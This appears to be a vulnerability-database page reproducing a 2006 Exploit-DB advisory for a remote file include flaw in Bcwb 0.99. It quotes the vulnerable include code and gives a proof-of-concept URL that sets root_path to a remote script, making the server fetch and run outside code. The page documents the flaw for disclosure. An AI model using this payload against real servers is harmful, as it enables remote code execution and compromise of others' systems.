Bcwb 0.99(root_path)Remote File Include Vulnerability

vendor:

Bcwb

by:

ajann

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: Bcwb

Affected Version From: 0.99

Affected Version To: 0.99

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Bcwb 0.99(root_path)Remote File Include Vulnerability

Bcwb 0.99 is vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary code on the server.

Mitigation:

Input validation should be used to prevent maliciously crafted HTTP requests from being sent to the vulnerable application.

Source

Exploit-DB raw data:

*******************************************************************************
# Title  :  Bcwb 0.99(root_path)Remote File Include Vulnerability

# Author :   ajann

# Greetz :   shadow and Suskun for host : )

# Exploit;

*******************************************************************************
[File]
startup.inc.php
[/File]

[Code,1]
startup.inc.php Error:


..
....
// Debug services
include($root_path.'include/startup/debug.inc.php');
include($root_path.'include/startup/common_functions.inc.php');
include($root_path.'include/lib/data.lib.php');
....
..

Key [:] root_path=http://target.com/command.php?

\Example:

http://target.com/include/startup.inc.php?root_path=http://target.com/command.php?

# ajann,Turkey
# ...
# Im not Hacker!

# milw0rm.com [2006-09-19]